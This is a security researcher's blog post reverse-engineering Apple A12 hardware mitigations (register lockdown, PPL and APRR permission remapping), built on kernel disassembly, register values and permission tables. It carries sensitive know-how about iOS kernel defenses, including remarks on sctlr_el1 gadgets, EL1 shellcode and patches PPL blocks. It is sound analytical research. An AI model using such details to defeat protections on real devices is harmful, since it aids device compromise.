Siguza, 08. Aug 2019
APRR
Of Apple hardware secrets.
Introduction
Almost a year ago I did a write-up on KTRR, first introduced in Apple’s A10 chip series. Now over the course of the last year, there has been a good bit of talk as well as confusion about the new mitigations shipped with Apple’s A12. One big change, PAC, has already been torn down in detail by Brandon Azad, so I’m gonna leave that out here. What’s left to cover is more than just APRR, but APRR is certainly the biggest chunk, hence the title of this post. Now the people who have attended TyphoonCon down in Seoul this year already got to see this research at an earlier stage - everyone else can get the slides here. On a separate note, Apple’s Head of Security Engineering Ivan Krstić returns to BlackHat US this year with a talk titled “Behind the scenes of iOS and Mac Security”. The bits about iOS 13 sure sound interesting, but this bit of the abstract caught my eye:
We will also discuss previously-undisclosed VM permission and page protection technologies that are part of our overall iOS code integrity architecture.
Let’s see if we can change this “previously-undisclosed” status, shall we? :P
KTRR amended
If you’ve read my KTRR post and poked a bit at any A12 kernel, chances are something caught your attention: __LAST.__pinst
lost a lot of instructions.
Here’s the entirety of __LAST.__pinst
on A11:
0xfffffff007630000 202018d5 msr ttbr1_el1, x0
0xfffffff007630004 c0035fd6 ret
0xfffffff007630008 00c018d5 msr vbar_el1, x0
0xfffffff00763000c c0035fd6 ret
0xfffffff007630010 402018d5 msr tcr_el1, x0
0xfffffff007630014 c0035fd6 ret
0xfffffff007630018 001018d5 msr sctlr_el1, x0
0xfffffff00763001c c0035fd6 ret
0xfffffff007630020 bf4100d5 msr spsel, 1
0xfffffff007630024 c0035fd6 ret
0xfffffff007630028 00f21cd5 msr s3_4_c15_c2_0, x0
0xfffffff00763002c c0035fd6 ret
0xfffffff007630030 20f21cd5 msr s3_4_c15_c2_1, x0
0xfffffff007630034 c0035fd6 ret
0xfffffff007630038 c0f21cd5 msr s3_4_c15_c2_6, x0
0xfffffff00763003c c0035fd6 ret
And here on A12:
0xfffffff008edc000 bf4100d5 msr spsel, 1
0xfffffff008edc004 c0035fd6 ret
0xfffffff008edc008 00f21cd5 msr s3_4_c15_c2_0, x0
0xfffffff008edc00c c0035fd6 ret
0xfffffff008edc010 20f21cd5 msr s3_4_c15_c2_1, x0
0xfffffff008edc014 c0035fd6 ret
0xfffffff008edc018 c0f21cd5 msr s3_4_c15_c2_6, x0
0xfffffff008edc01c c0035fd6 ret
These were the instructions that should not exist anywhere else in the kernel, in order to not have them executable after reset. But sure enough if you go looking for the missing ones now, you’ll find them scattered all throughout the kernel, apparently entirely unprotected. But while Apple is scatterbrained at times, they’re not that scatterbrained[citation needed]. The thing is, when you try and jump to any instruction writing to ttbr1_el1
, vbar_el1
or tcr_el1
, this happens:
panic(cpu 0 caller 0xfffffff01dd79b84): "Undefined kernel instruction: pc=0xfffffff01dbd8084 instr=d518c000\n"
Debugger message: panic
Memory ID: 0xff
OS version: 16A405
Kernel version: Darwin Kernel Version 18.0.0: Tue Aug 14 22:07:18 PDT 2018; root:xnu-4903.202.2~1/RELEASE_ARM64_T8020
Kernel UUID: BEFBC911—B1BC-3553—B7EA-1ECE60169886
iBoot version: iBoot-4513.200.297
secure boot?: YES
Paniclog version: 10
Kernel slide: 0x0000000016200000
Kernel text base: 0xfffffff01d204000
Epoch Time: sec usec
Boot : 0x5cc4e1ec 0x000c74d9
Sleep : 0x00000000 0x00000000
Wake : 0x00000000 0x00000000
Calendar: 0x5cc4e21d 0x000d3015
What’s that faulting instruction d518c000
, you ask? Bad news:
$ rasm2 -aarm -b64 -D $(hexswap d518c000)
0x00000000 4 00c018d5 msr vbar_el1, x0
It’s the very instruction we wanted to run.
That makes a lot of sense when you think about it from a chip designer’s point of view though. The reason why Apple no longer stuffs these instructions under __LAST.__pinst
is because they’ve upgraded their silicon to provide a much stronger guarantee, one that holds up even if they leave some instructions in by mistake, or if you can pull some cache magic to inject some of your own: they just flip a switch and make the instructions undefined altogether.
And looking at set_tcr
or set_mmu_ttb_alternate
tells us exactly where this switch is (you can find them by just searching for the instructions):
;-- set_tcr
0xfffffff0079d8c18 014040ca eor x1, x0, x0, lsr 16
0xfffffff0079d8c1c 21144092 and x1, x1, 0x3f
0xfffffff0079d8c20 e10000b5 cbnz x1, 0xfffffff0079d8c3c
0xfffffff0079d8c24 41f13cd5 mrs x1, s3_4_c15_c1_2
0xfffffff0079d8c28 21007e92 and x1, x1, 4
0xfffffff0079d8c2c 410100b5 cbnz x1, 0xfffffff0079d8c54
0xfffffff0079d8c30 402018d5 msr tcr_el1, x0
0xfffffff0079d8c34 df3f03d5 isb
0xfffffff0079d8c38 c0035fd6 ret
;-- set_mmu_ttb_alternate
0xfffffff0079d8bd0 9f3f03d5 dsb sy
0xfffffff0079d8bd4 41f13cd5 mrs x1, s3_4_c15_c1_2
0xfffffff0079d8bd8 21007c92 and x1, x1, 0x10
0xfffffff0079d8bdc c10300b5 cbnz x1, 0xfffffff0079d8c54
0xfffffff0079d8be0 202018d5 msr ttbr1_el1, x0
0xfffffff0079d8be4 df3f03d5 isb
0xfffffff0079d8be8 c0035fd6 ret
Both contain something that is not in public XNU sources, namely a read from the register s3_4_c15_c1_2
, and a jump away if some certain bits are set. The place it jumps to calls panic with string attempt to set locked register
, which is a pretty clear message. Searching for further accesses to s3_4_c15_c1_2
brings us to this snippet, which is run as part of the reset code:
0xfffffff0079d8bfc df3f03d5 isb
0xfffffff0079d8c00 0100f0d2 mov x1, -0x8000000000000000
0xfffffff0079d8c04 a00280d2 mov x0, 0x15
0xfffffff0079d8c08 000001aa orr x0, x0, x1
0xfffffff0079d8c0c 40f11cd5 msr s3_4_c15_c1_2, x0
0xfffffff0079d8c10 df3f03d5 isb
0xfffffff0079d8c14 c0035fd6 ret
So it gets the value 0x8000000000000015
. The code above tells us that 0x4
is for tcr_el1
and 0x10
for ttbr1_el1
, but what about the other two? The code setting vbar_el1
contains no register check, but I’m assuming it’s controlled by bit 0x1
. As for bit 63, I’m fairly confident that serves a slightly more… fine-grained purpose. Because there’s one register that used to be under __LAST.__pinst
that we haven’t talked about yet: sctlr_el1
.
The thing with sctlr_el1
is that the instruction writing to it is not made undefined. In fact, the register is actively written to by the exception handlers if coming from EL0:
0xfffffff0079cf304 001038d5 mrs x0, sctlr_el1
0xfffffff0079cf308 c000f837 tbnz w0, 0x1f, 0xfffffff0079cf320
0xfffffff0079cf30c 000061b2 orr x0, x0, 0x80000000
0xfffffff0079cf310 000065b2 orr x0, x0, 0x8000000
0xfffffff0079cf314 000073b2 orr x0, x0, 0x2000
0xfffffff0079cf318 001018d5 msr sctlr_el1, x0
0xfffffff0079cf31c df3f03d5 isb
The tbnz
there is a bit of a sloppy check, but under the assumption of kernel integrity it’s all fine. Basically the kernel checks for the EnIA
bit here (which controls whether pacia
instructions are no-ops), and if not set, sets bits EnIA
, EnDA
and EnDB
. What’s happening here is that three of the five PAC keys are disabled for userland apps that are not arm64e, because those would otherwise crash horribly (the IB
key is not disabled because it’s used for stack frames, which are local to each function and thus not an issue). These keys need to be re-enabled on entry to the kernel, and so sctlr_el1
actually has to be writeable. This would make it a very interesting target since it controls the MMU, which, if turned off, would allow us to run shellcode at EL1. But of course it’s not that simple.
Even if you jump to an instruction that writes to sctlr_el1
and make it unset bit 0
, which should turn off the MMU - it will simply not turn off. This is where (I’m wildly assuming) bit 63 from the s3_4_c15_c1_2
register comes in. It appears that certain bits of sctlr_el1
are locked down, while others remain writeable. I haven’t gone on to test which bits these are exactly, because for one the available sctlr_el1
gadgets are very uncomfortable to use, and for two we know that the PAC bits are writeable, the M bit is not, and the rest of the bits are, quite frankly, not of much interest to me.
Of more interest to me was the question of whether s3_4_c15_c1_2
itself remains writeable and could be used to unlock these registers again. To which the answer is of course also no.
The instructions writing to s3_4_c15_c1_2
are not themselves made undefined, but as with parts of sctlr_el1
, the register value will simply not change anymore. I’m assuming this is also controlled by bit 63.
Now, as might be obvious, my research in this area hasn’t gone into great detail so far. I hope to eventually find the time to revisit the register in question, and update this post accordingly.
It’s clear though that the register’s purpose is to lock down other registers. Wanting to be more specific than just “the lockdown register”, I skimmed the ARMv8 spec for a place where registers are grouped together, but the most narrow group encompassing all of ttbr1_el1
, tcr_el1
, sctlr_el1
and vbar_el1
is the VMSA (Virtual Memory System Architecture), so for lack of a better name I propose s3_4_c15_c1_2
to be called VMSA_LOCKDOWN_EL1
.
As a side note, there seems to exist a register by the same name on chips older than the A12, but that exhibits entirely different behaviour and does not seem to affect VMSA registers at all.
And I feel like I should also note that there is another register introduced with the A12: s3_4_c15_c2_5
. The numbering puts it just above the other three KTRR registers:
0xfffffff0079d410c 71f21cd5 msr s3_4_c15_c2_3, x17
0xfffffff0079d4110 93f21cd5 msr s3_4_c15_c2_4, x19
0xfffffff0079d4114 510280d2 mov x17, 0x12
0xfffffff0079d4118 b1f21cd5 msr s3_4_c15_c2_5, x17
0xfffffff0079d411c 310080d2 mov x17, 1
0xfffffff0079d4120 51f21cd5 msr s3_4_c15_c2_2, x17
Being written to right in the middle of the KTRR lockdown sequence would suggest it is part of KTRR, but I have to admit I have no idea what it does, or what the value 0x12
means that is written to it.
A thing called PPL
The VMSA_LOCKDOWN_EL1
register from the last section seems to have neither gotten any public attention, nor affected exploitation of the A12. What got a lot more attention, of course, was PAC. Being part of the ARMv8 spec, it was fairly public, and seems to have been treated as the big thing new to the A12, security-wise. And in the beginning it seemed really strong, but after Brandon Azad discovered a design flaw or two, it doesn’t really hold up to a motivated attacker anymore. But the A12 came with yet another security… thing - and this one, in my humble opinion, is the real killer: PPL.
Basically A12 kernels have a bunch of new segments:
LC 03: LC_SEGMENT_64 Mem: 0xfffffff008eb4000-0xfffffff008ec8000 __PPLTEXT
LC 04: LC_SEGMENT_64 Mem: 0xfffffff008ec8000-0xfffffff008ed8000 __PPLTRAMP
LC 05: LC_SEGMENT_64 Mem: 0xfffffff008ed8000-0xfffffff008edc000 __PPLDATA_CONST
LC 07: LC_SEGMENT_64 Mem: 0xfffffff008ee0000-0xfffffff008ee4000 __PPLDATA
Of course Apple won’t tell us what the acronym “PPL” stands for (~anyone at Blackhat willing to annoy Ivan over this? :P~ UPDATE: it stands for “Page Protection Layer”!), but that doesn’t stop us from taking it apart.
Anyone doing post-exploitation on A12 will have undoubtedly come across PPL already. Because a bunch of memory patches that used to work just fine on A11 and earlier (namely trust cache injection and page table patches) make the A12 kernel panic with a kernel data abort (i.e. insufficient memory permissions). The thing is though, the kernel can definitely still write to that memory somehow - and if you try and track down the code that does so, you’ll find that all such accesses happen from inside __PPLTEXT
. It would appear as though that code was “privileged” somehow - but of course you can’t just invoke it, since that will also panic, this time with an instruction fetch abort. Of course you can then go track down the code that calls into __PPLTEXT
, which will reveal that all such invocations go through __PPLTRAMP
.
At this point, there are two areas of interest one can dive into:
- What kind of code exists in PPL, what parts of it are exposed through the trampoline, and how you can invoke them.
- How this “privileged mode” works, what the underlying hardware primitives are, and what makes the PPL segments so special.
Point 1 has already been covered in a detailed write-up by Jonathan Levin, which I encourage you to read if you want to know more about that. The gist of it is that there are a bunch of “interesting things” such as page tables, trust caches and more (again, see Jonathan’s post) that are now only accessible in “privileged mode”, and thus remain protected even in the face of an attacker with “normal” kernel rwx. That might seem like adding just another layer to be hacked, but you’ll find that the reduction in attack surface is actually huge when you start counting pages. In the iPhone XR’s 12.0.1 kernel (random example because I had that one handy), there are 1339 pages in __TEXT_EXEC
but a mere 5 pages in __PPLTEXT
. Here’s a visualisation of that:
Page tables and equally critical things had been freely (and needlessly!) accessible from that entire red part, when the green part was all that really required such access, so it only makes sense to lock that down. In addition, locking down page tables can foil the plans of some newbie hacker who thought he was really smart once upon a time:
So far so good for point 1 above, but point 2 is what I’m really here for. This is something that has gotten zero public mention, and I was surprised to learn that barely anyone I know seems to have researched this in private as well (granted, it’s not required for exploitation, but I consider it interesting nevertheless).
Going about this logically, there will have to be two parts that make up this privileged mode:
- Some switch that is flipped on entry to and exit from
__PPLTEXT
. - Some attribute that makes the
__PPL*
segments stand out from the rest.
The former is found in __PPLTRAMP
, right at the top of the entry/exit routines:
0xfffffff008ecbfe0 34423bd5 mrs x20, daif
0xfffffff008ecbfe4 df4703d5 msr daifset, 7
0xfffffff008ecbfe8 ae8ae8f2 movk x14, 0x4455, lsl 48
0xfffffff008ecbfec ae8ac8f2 movk x14, 0x4455, lsl 32
0xfffffff008ecbff0 ce8cacf2 movk x14, 0x6466, lsl 16
0xfffffff008ecbff4 eece8cf2 movk x14, 0x6677
0xfffffff008ecbff8 2ef21cd5 msr s3_4_c15_c2_1, x14
0xfffffff008ecbffc df3f03d5 isb
0xfffffff008ecc000 df4703d5 msr daifset, 7
0xfffffff008ecc004 ae8ae8f2 movk x14, 0x4455, lsl 48
0xfffffff008ecc008 ae8ac8f2 movk x14, 0x4455, lsl 32
0xfffffff008ecc00c ce8cacf2 movk x14, 0x6466, lsl 16
0xfffffff008ecc010 eece8cf2 movk x14, 0x6677
0xfffffff008ecc014 35f23cd5 mrs x21, s3_4_c15_c2_1
0xfffffff008ecc018 df0115eb cmp x14, x21
0xfffffff008ecc01c e1050054 b.ne 0xfffffff008ecc0d8
0xfffffff008ed3fec ae8ae8f2 movk x14, 0x4455, lsl 48
0xfffffff008ed3ff0 8e8ac8f2 movk x14, 0x4454, lsl 32
0xfffffff008ed3ff4 ce8cacf2 movk x14, 0x6466, lsl 16
0xfffffff008ed3ff8 ee8e8cf2 movk x14, 0x6477
0xfffffff008ed3ffc 2ef21cd5 msr s3_4_c15_c2_1, x14
0xfffffff008ed4000 df3f03d5 isb
And the latter is found in page tables (the permissions shown here are kernel/user - note that these permissions not only apply to PPL segments but also data dynamically allocated by PPL):
Obviously the PPL pages don’t really have these permissions - that’s just what’s the page table entries say. The real permissions are like this for “unprivileged”/normal mode:
And get flipped to this for “privileged”/PPL mode:
Before we can dive into how that works though, we have to look at something else. Something that, too, has not been publicly torn down. Something that, too, has to do with memory access permissions.
A new JIT on the block
This tale starts, because how could it be any different, with Ivan Krstić’s 2016 BlackHat talk. In the part about JIT, he has helpful graphics showing how JIT was implemented up to and including iOS 9 (images blatantly stolen from his slides):
And how this would change with iOS 10:
(For more info on that, go check out his talk - going forward here, I assume you know how that works.)
That was nice and well, but just a year later with the release of the A11, Apple moved back to a unified JIT region - with a little caveat. Rather than being fully RWX, a proprietary system register would control whether the region was currently rw-
or r-x
, and all JIT-emitting code would access configure register accordingly. One such JIT-emitting code looks as follows (taken from the XR’s 12.1 JSC, again simply because I had that one handy):
0x188347298 002298f2 movk x0, 0xc110
0x18834729c e0ffbff2 movk x0, 0xffff, lsl 16
0x1883472a0 e001c0f2 movk x0, 0xf, lsl 32
0x1883472a4 0000e0f2 movk x0, 0, lsl 48
0x1883472a8 000040f9 ldr x0, [x0]
0x1883472ac e0f21cd5 msr s3_4_c15_c2_7, x0
0x1883472b0 df3f03d5 isb
0x1883472b4 012298f2 movk x1, 0xc110
0x1883472b8 e1ffbff2 movk x1, 0xffff, lsl 16
0x1883472bc e101c0f2 movk x1, 0xf, lsl 32
0x1883472c0 0100e0f2 movk x1, 0, lsl 48
0x1883472c4 280040f9 ldr x8, [x1]
0x1883472c8 e9f23cd5 mrs x9, s3_4_c15_c2_7
0x1883472cc 1f0109eb cmp x8, x9
0x1883472d0 c1020054 b.ne 0x188347328
0x1883472d4 e00315aa mov x0, x21
0x1883472d8 e10314aa mov x1, x20
0x1883472dc e20313aa mov x2, x19
0x1883472e0 19a82b94 bl sym.imp._ZN3JSC4YarrL22createCharacterClass98Ev
0x1883472e4 c8024039 ldrb w8, [x22]
0x1883472e8 08020034 cbz w8, 0x188347328
0x1883472ec 002398f2 movk x0, 0xc118
0x1883472f0 e0ffbff2 movk x0, 0xffff, lsl 16
0x1883472f4 e001c0f2 movk x0, 0xf, lsl 32
0x1883472f8 0000e0f2 movk x0, 0, lsl 48
0x1883472fc 000040f9 ldr x0, [x0]
0x188347300 e0f21cd5 msr s3_4_c15_c2_7, x0
0x188347304 df3f03d5 isb
0x188347308 012398f2 movk x1, 0xc118
0x18834730c e1ffbff2 movk x1, 0xffff, lsl 16
0x188347310 e101c0f2 movk x1, 0xf, lsl 32
0x188347314 0100e0f2 movk x1, 0, lsl 48
0x188347318 280040f9 ldr x8, [x1]
0x18834731c e9f23cd5 mrs x9, s3_4_c15_c2_7
0x188347320 1f0109eb cmp x8, x9
0x188347324 60020054 b.eq 0x188347370
0x188347328 200020d4 brk 1
So the system register in question is s3_4_c15_c2_7
, and it gets its values from the hardcoded addresses 0xfffffc110/8
- which are on the “commpage”, outside the range in which userland code is allowed to map memory. Those values are set up by the kernel in commpage_populate
, but obviously the parts we care about are once again not in public XNU sources. You can find it in assembly though by looking for xrefs to the string "commpage cpus==0"
, and then far down the function referencing that you’ll see something like this:
0xfffffff007b85390 caee8ed2 mov x10, 0x7776
0xfffffff007b85394 0a22a2f2 movk x10, 0x1110, lsl 16
0xfffffff007b85398 eacecef2 movk x10, 0x7677, lsl 32
0xfffffff007b8539c 4a46e6f2 movk x10, 0x3232, lsl 48
0xfffffff007b853a0 ea038a9a csel x10, xzr, x10, eq
0xfffffff007b853a4 cbee8ed2 mov x11, 0x7776
0xfffffff007b853a8 0b42a2f2 movk x11, 0x1210, lsl 16
0xfffffff007b853ac ebcecef2 movk x11, 0x7677, lsl 32
0xfffffff007b853b0 4b46e6f2 movk x11, 0x3232, lsl 48
0xfffffff007b853b4 eb038b9a csel x11, xzr, x11, eq
0xfffffff007b853b8 28310439 strb w8, [x9, 0x10c]
0xfffffff007b853bc 88b243f9 ldr x8, [x20, 0x760]
0xfffffff007b853c0 0a8900f9 str x10, [x8, 0x110]
0xfffffff007b853c4 88b243f9 ldr x8, [x20, 0x760]
0xfffffff007b853c8 0b8d00f9 str x11, [x8, 0x118]
At this point, the A11 JIT and A12 PPL look kinda similar.
As for how both of them work and what gives it away, that brings us to the punch line of this post:
Enter APRR
Before the release of the A12, there were rumours about “userland KTRR” coming up, and that being called “APRR”. That’s not what happened, but let’s write down what we already know:
- PPL page tables are weirdly missing the UXN bit (which would make them executable under a standard ARMv8.* implementation).
- Entry and exit from PPL changes
s3_4_c15_c2_1
to0x4455445564666677
/0x4455445464666477
. - Entry and exit from JIT-emitting code changes
s3_4_c15_c2_7
to0x3232767711107776
/0x3232767712107776
.
Pretty much the only speculation I’ve heard on this matter is that Apple has simply repurposed the UXN page table bit somehow. On a technical level that is not true, but it’s an interesting notion that we’ll get back to later. As for the register values, everyone who talked about this simply treated them as magical constants, but here’s the first clue: all digits in these values are between 0x0
and 0x7
, and there are none between 0x8
and 0xf
. That would make it either an odd choice or a big coincidence if it were just some random constant.
The second clue is the encoding space in which these registers are located: s3_4_c15_c2_*
. Not only are these two registers in there, but so are the KTRR registers as well as this other register we found on the A12 that gets 0x12
written to it. This leaves us with:
Register | Note |
---|---|
s3_4_c15_c2_0 |
??? |
s3_4_c15_c2_1 |
Used by PPL |
s3_4_c15_c2_2 |
KTRR_LOCK_EL1 |
s3_4_c15_c2_3 |
KTRR_LOWER_EL1 |
s3_4_c15_c2_4 |
KTRR_UPPER_EL1 |
s3_4_c15_c2_5 |
Gets value 0x12 on A12 |
s3_4_c15_c2_6 |
??? |
s3_4_c15_c2_7 |
Used by JIT, EL0-accessible |
That means there’s two registers we haven’t seen yet - let’s keep an eye out for those, shall we? Also from here on out, I’ll be referring to these registers simply by their last digit for brevity (e.g. as in “register 0
and 6
are the ones we have yet to see”).
Alright, how do we find out more about APRR? Well we could simply search for instructions operating on these registers, but before we do that, let me introduce you to this high-tech hacking tool called strings
…
$ strings kernel | fgrep APRR
"%s: invalid APRR index, " "start=%p, end=%p, aprr_index=%u, expected_index=%u"
"pmap_page_protect: modifying an APRR mapping pte_p=%p pmap=%p prot=%d options=%u, pv_h=%p, pveh_p=%p, pve_p=%p, pte=0x%llx, tmplate=0x%llx, va=0x%llx ppnum: 0x%x"
"pmap_page_protect: creating an APRR mapping pte_p=%p pmap=%p prot=%d options=%u, pv_h=%p, pveh_p=%p, pve_p=%p, pte=0x%llx, tmplate=0x%llx, va=0x%llx ppnum: 0x%x"
"Unsupported APRR index %llu for pte 0x%llx"
Not bad, this tells us quite a bit. For one, it seems that pmap_page_protect
deals with APRR, so we’ll go check that out in a second. But for two, something a bit more inconspicuous, it sounds like APRR has indices. With that in mind, let’s dive into some assembly:
0xfffffff008eb8624 0bf23cd5 mrs x11, s3_4_c15_c2_0
0xfffffff008eb8628 2af23cd5 mrs x10, s3_4_c15_c2_1
0xfffffff008eb862c c8f23cd5 mrs x8, s3_4_c15_c2_6
0xfffffff008eb8630 49ff44d3 lsr x9, x26, 4
0xfffffff008eb8634 29057e92 and x9, x9, 0xc
0xfffffff008eb8638 49d774b3 bfxil x9, x26, 0x34, 2
0xfffffff008eb863c 49db76b3 bfxil x9, x26, 0x36, 1
0xfffffff008eb8640 2cf57ed3 lsl x12, x9, 2
0xfffffff008eb8644 edc300b2 orr x13, xzr, 0x101010101010101
0xfffffff008eb8648 edecacf2 movk x13, 0x6767, lsl 16
0xfffffff008eb864c ada8e8f2 movk x13, 0x4545, lsl 48
0xfffffff008eb8650 6d010dca eor x13, x11, x13
0xfffffff008eb8654 eb0b0032 orr w11, wzr, 7
0xfffffff008eb8658 6b21cc9a lsl x11, x11, x12
0xfffffff008eb865c 7f010dea tst x11, x13
0xfffffff008eb8660 81010054 b.ne 0xfffffff008eb8690
0xfffffff008eb8664 ecce8cd2 mov x12, 0x6677
0xfffffff008eb8668 ccccacf2 movk x12, 0x6666, lsl 16
0xfffffff008eb866c ac8ac8f2 movk x12, 0x4455, lsl 32
0xfffffff008eb8670 ac8ae8f2 movk x12, 0x4455, lsl 48
0xfffffff008eb8674 4a010cca eor x10, x10, x12
0xfffffff008eb8678 7f010aea tst x11, x10
0xfffffff008eb867c a1000054 b.ne 0xfffffff008eb8690
0xfffffff008eb8680 ea030032 orr w10, wzr, 1
0xfffffff008eb8684 4921c99a lsl x9, x10, x9
0xfffffff008eb8688 3f0108ea tst x9, x8
0xfffffff008eb868c 00020054 b.eq 0xfffffff008eb86cc
Lo and behold, there are those two system registers we just said we hadn’t seen yet! (Thought actually I lied - we’ve seen them already in __LAST.__pinst
, that’s just a bit moot since we have zero context there.)
What you’re looking at is part of the pmap_page_protect_internal
function (a part which is yet again not in public sources, obviously) that has been inlined into pmap_page_protect
, with x26
being a TTE about to be entered into a page table.
So what’s happening here? At the top we have the register reads, then we have some bit mashing, and finally a few branches to panic()
if the resulting values are not zero. And it’s the bit mashing we’re interested in. Translated to C code it would probably look really ugly, but put into words, there are three simple actions:
- The register values are XOR’ed with some constants (
4545010167670101
/0x4455445566666677
). - A 4-bit number is constructed from the TTE in the form of
<AP[2:1]>:<PXN>:<UXN>
. - The value
0x7
is left-shifted by that number times four, and used to mask the XOR’ed value.
That last bullet point is particularly interesting, because it precisely describes the concept of register indexing. If you’re not familiar with it, the ARMv8 Reference Manual has at least one good example I know of: MAIR_EL1
, on page D13-3202
:
Long story short, in translation table entries you have an AttrIndx
field with 3 bits, i.e. values from 0x0
to 0x7
. Those are then used to index the MAIR_EL1
register to get the Attr*
fields. Since you have 8 fields in a 64bit register, that makes each field 8 bits wide.
And that is precisely what’s happening with APRR here, the only difference being that instead of a 3-bit index we have a 4-bit one, and hence the registers 0
and 1
have 16 fields that are each 4 bits wide. We left out register 6
above, which is indexed a bit differently - the index itself is the same, but its fields seem to be just 1 bit wide rather than 4 (a nice property about both of these values is that this translates to exactly one digit in hexadecimal/binary).
This tells us the register layout, but we still don’t know the meaning of the individual fields. For that, it might be helpful to collect all values that are somehow used with these registers. Here’s that collection:
Value description | Register 0 |
Register 1 |
Register 6 |
Register 7 |
---|---|---|---|---|
XOR’ed in pmap_page_protect |
0x4545010167670101 |
0x4455445566666677 |
- | - |
Assigned after CPU reset (A11) | 0x4545010165670101 0x4545010167670101 |
0x4455445564666677 |
0b0000000000000000 |
0x3232767612107676 |
Assigned after CPU reset (A12) | 0x4545010065670001 0x4545010067670001 |
0x4455445464666477 0x4455445564666677 |
0b0000000000000000 |
0x3232767712107776 |
PPL entry (A12) | - | 0x4455445564666677 |
- | - |
PPL exit (A12) | - | 0x4455445464666477 |
- | - |
Process has JIT disabled (A11) | 0x4545010165670101 |
- | 0b0000000001000000 |
- |
Process has JIT enabled (A11) | 0x4545010167670101 |
- | 0b0000000001000000 |
- |
Process has JIT disabled (A12) | 0x4545010065670001 |
- | 0b0000000001000000 |
- |
Process has JIT enabled (A12) | 0x4545010067670001 |
- | 0b0000000001000000 |
- |
JIT region is rw- |
- | - | - | 0x3232767711107776 |
JIT region is r-x |
- | - | - | 0x3232767712107776 |
And then we can do something else: we can take all possible 4-bit indices 0x0
through 0xf
, write down what permission it would normally give us when used in a TTE.
Index | Kernel access | Userland access |
---|---|---|
0x0 |
rwx |
--x |
0x1 |
rwx |
--- |
0x2 |
rw- |
--x |
0x3 |
rw- |
--- |
0x4 |
rwx |
rwx |
0x5 |
rwx |
rw- |
0x6 |
rw- |
rwx |
0x7 |
rw- |
rw- |
0x8 |
r-x |
--x |
0x9 |
r-x |
--- |
0xa |
r-- |
--x |
0xb |
r-- |
--- |
0xc |
r-x |
r-x |
0xd |
r-x |
r-- |
0xe |
r-- |
r-x |
0xf |
r-- |
r-- |
And then we can take some of the values above, and index it for each row. Let’s take for example the values A12 uses when entering/exiting PPL (as well as some reg 0
value):
Index | Krn/Usr | Reg 1 on PPL entry |
Reg 1 on PPL exit |
Changed? | Reg 0 |
---|---|---|---|---|---|
0x0 |
rwx/--x |
0x7 |
0x7 |
0x1 |
|
0x1 |
rwx/--- |
0x7 |
0x7 |
0x0 |
|
0x2 |
rw-/--x |
0x6 |
0x4 |
<– | 0x0 |
0x3 |
rw-/--- |
0x6 |
0x6 |
0x0 |
|
0x4 |
rwx/rwx |
0x6 |
0x6 |
0x7 |
|
0x5 |
rwx/rw- |
0x6 |
0x6 |
0x6 |
|
0x6 |
rw-/rwx |
0x4 |
0x4 |
0x7 |
|
0x7 |
rw-/rw- |
0x6 |
0x6 |
0x6 |
|
0x8 |
r-x/--x |
0x5 |
0x4 |
<– | 0x0 |
0x9 |
r-x/--- |
0x5 |
0x5 |
0x0 |
|
0xa |
r--/--x |
0x4 |
0x4 |
0x1 |
|
0xb |
r--/--- |
0x4 |
0x4 |
0x0 |
|
0xc |
r-x/r-x |
0x5 |
0x5 |
0x5 |
|
0xd |
r-x/r-- |
0x5 |
0x5 |
0x4 |
|
0xe |
r--/r-x |
0x4 |
0x4 |
0x5 |
|
0xf |
r--/r-- |
0x4 |
0x4 |
0x4 |
Let’s first look at the reg 1
values. I’ve marked the two digits that change on entry/exit, and sure enough they affect precisely the protections that PPL pages are mapped with.
Now let’s see, from 0x6
and 0x5
both to 0x4
, that sound familiar? Maybe from a UNIX environment? Maybe from a tool called chmod
?
The big enlightenment
They are permissions in rwx
form! 0x4
= r
, 0x2
= w
, 0x1
= x
.
The four page table bits that normally determine the access protections have lost all meaning on newer Apple chips. They are now solely used to construct that 4-bit number, which is then used to index the APRR registers, which hold the actual permissions.
Register 0
is used for EL0 permissions, register 1
for EL1. If registers 6
and 7
are still unclear, we can simply repeat the above process with them:
Index | Krn/Usr | Reg 0 |
Reg 6 if JIT enabled |
Reg 7 if JIT rw- |
Reg 7 if JIT r-x |
Changed? |
---|---|---|---|---|---|---|
0x0 |
rwx/--x |
0x1 |
0x0 |
0x6 |
0x6 |
|
0x1 |
rwx/--- |
0x0 |
0x0 |
0x7 |
0x7 |
|
0x2 |
rw-/--x |
0x0 |
0x0 |
0x7 |
0x7 |
|
0x3 |
rw-/--- |
0x0 |
0x0 |
0x7 |
0x7 |
|
0x4 |
rwx/rwx |
0x7 |
0x0 |
0x0 |
0x0 |
|
0x5 |
rwx/rw- |
0x6 |
0x0 |
0x1 |
0x1 |
|
0x6 |
rw-/rwx |
0x7 |
0x1 |
0x1 |
0x2 |
<– |
0x7 |
rw-/rw- |
0x6 |
0x0 |
0x1 |
0x1 |
|
0x8 |
r-x/--x |
0x0 |
0x0 |
0x7 |
0x7 |
|
0x9 |
r-x/--- |
0x0 |
0x0 |
0x7 |
0x7 |
|
0xa |
r--/--x |
0x1 |
0x0 |
0x6 |
0x6 |
|
0xb |
r--/--- |
0x0 |
0x0 |
0x7 |
0x7 |
|
0xc |
r-x/r-x |
0x5 |
0x0 |
0x2 |
0x2 |
|
0xd |
r-x/r-- |
0x4 |
0x0 |
0x3 |
0x3 |
|
0xe |
r--/r-x |
0x5 |
0x0 |
0x2 |
0x2 |
|
0xf |
r--/r-- |
0x4 |
0x0 |
0x3 |
0x3 |
The only digit that changed in reg 7
is the one corresponding to rw-/rwx
- which would seem like the permissions the JIT region is mapped with. And obviously that is also the only index at which reg 6
has a 1
. To not beat around the bush any longer, register 6
tells us whether or not to consult register 7
, and if we do, we use register 7
to mask out certain bits, i.e. if the digit in question is 0x1
, that will strip the executable bit.
With that all figured out, we can complete our register table from above with sensible names:
Register | Name |
---|---|
s3_4_c15_c2_0 |
APRR0_EL1 |
s3_4_c15_c2_1 |
APRR1_EL1 |
s3_4_c15_c2_2 |
KTRR_LOCK_EL1 |
s3_4_c15_c2_3 |
KTRR_LOWER_EL1 |
s3_4_c15_c2_4 |
KTRR_UPPER_EL1 |
s3_4_c15_c2_5 |
KTRR_UNKNOWN_EL1 |
s3_4_c15_c2_6 |
APRR_MASK_EN_EL1 |
s3_4_c15_c2_7 |
APRR_MASK_EL0 |
If this was a bit too much bit shifting and twiddling for you, I have some slides from my TyphoonCon talk on how you get from the page table bits to the actual rwx
permissions (available in full here, pages pages 103-119).
Here’s how it would work in a standard ARMv8.* implementation:
And here’s how it works on chips with APRR (the orange boxes are register numbers):
Two notes on these:
- This still isn’t the whole picture - there will be more detail further down this post, but that’s not gonna fit into a nice graph anymore.
